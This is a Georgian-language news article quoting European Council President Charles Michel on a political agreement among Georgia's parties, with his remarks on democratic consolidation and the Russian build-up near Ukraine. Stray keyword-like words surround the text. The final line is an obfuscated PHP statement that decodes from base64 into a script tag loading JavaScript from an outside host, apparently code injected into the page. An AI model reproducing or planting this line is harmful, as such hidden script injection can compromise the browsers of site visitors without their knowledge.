celsiusi
ავერსი საქკაბელი
ძვირფასო მეგობრებო, ეს შეთანხმება არ არის ფინიშის ხაზი, ეს შეთანხმება არის საწყისი წერტილი, თქვენი სამუშაოსთვის, რომელიც უნდა გასწიოთ საქართველოს დემოკრატიულობის კონსოლიდაციის გზაზე,- ამის შესახებ ევროპული საბჭოს პრეზიდენტმა შარლ მიშელმა პოლიტიკური პარტიებისადმი გაკეთებულ მიმართვაში განაცხადა.
 
მისი თქმით, შეთანხმება, რომელიც არის საქართველოში შექმნილი ჩიხური მდგომარეობიდან არსებული გამოსავალი, განსაკუთრებით მნიშვნელოვანია რეგიონალურ კონტექსტში, უპირატესად კი მაშინ, როდესაც უკრაინის საზღვრის გასწვრივ და უკანონოდ ანექსირებულ ყირიმში რუსული სამხედრო წარმომადგენლობა იმატებს. მიშელის შეფასებით, ის თუ როგორ უპასუხა ქართულმა პოლიტიკურმა საზოგადოებამ ჩიხურ მდგომარეობას, ნამდვილად არის კრიზისის გადაჭრის ევროპული გზა.
 
„მე მადლობელი ვარ საქართველოს პრემიერ-მინისტრის, მისი ხედვისთვის და ასევე, თქვენი, პოლიტიკური ლიდერების და ოპოზიციური პარტიების არჩეული წევრების, თქვენი გამბედაობისა და თქვენი გამბედავი პოლიტიკური არჩევნისთვის. ქალბატონო პრეზიდენტო, მე, ასევე, მსურს თქვენ გადაგიხადოთ მადლობა, ჩვენ ახლო კონტაქტს ვინარჩუნებდით ამ პერიოდის განმავლობაში, თქვენ მიზიარებდით თქვენს რეკომენდაციებს, რაც უკიდურესად მნიშვნელოვანი და სასარგებლო იყო ჩემთვის, დიდი მადლობა თქვენი სიბრძნისთვის!
 
ძვირფასო მეგობრებო, ეს შეთანხმება არ არის ფინიშის ხაზი, ეს შეთანხმება არის საწყისი წერტილი, საწყისი წერტილი თქვენი სამუშაოსთვის, რომელიც უნდა გასწიოთ საქართველოს დემოკრატიულობის კონსოლიდაციის გზაზე და თქვენი სამუშაოსთვის, რომელიც უნდა გასწიოთ საქართველოს ევროატლანტიკური მომავლის გზაზე. საქართველოს მოქალაქეებს თქვენი იმედი აქვთ, რომ თქვენ ფოკუსირებას მოახდენთ საქართველოში არსებულ გამოწვევებზე, რომელიც უკავშირდება ეკონომიკას, კოვიდ -19 -ის პანდემიას და რეფორმებს კანონის უზენაესობისა და სასამართლო სისტემის სფეროში, რეგიონალური გამოწვევების მიმართულებით, მაგრამ, ასევე, იმედი აქვთ, რომ ფოკუსირებას მოახდენთ დემოკრატიული ინსტიტუტების გაძლიერების ხელშეწყობაზე“, - განაცხადა შარლ მიშელმა.
 
მან იმ პარტიებსაც მიმართა, ვინც დღეს შეთანხმების დოკუმენტს ხელი არ მოაწერეს და გაერთიანების პერსპექტივის განხილვა სთხოვა საქართველოს ინკლუზიური, მულტიპარტიული დემოკრატიული მომავლისთვის.
 
„და ბოლოს, მე მჯერა, რომ დღევანდელი ახალი თავი განსაკუთრებით მნიშვნელოვანია რთულ რეგიონალურ კონტექსტში. რეგიონი დგას ბევრი გამოწვევის წინაშე, რაც მთიანი ყარაბაღის საკითხმა მტკივნეულად შეგვახსენა, დღეს კი სამხედრო წარმომადგენლობის ზრდა უკრაინის საზღვრის გასწვრივ და არალეგალურად ანექსირებულ ყირიმში, არის შეშფოთების საგანი. ის თუ როგორ უპასუხეთ ქვეყანაში არსებულ ჩიხურ მდგომარეობას, განსაკუთრებით მნიშვნელოვანი ამ რეგიონალურ კონტექსტში, ეს კრიზისის გადაჭრის ნამდვილად ევროპული გზაა“, - განაცხადა შარლ მიშელმა.
1253
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");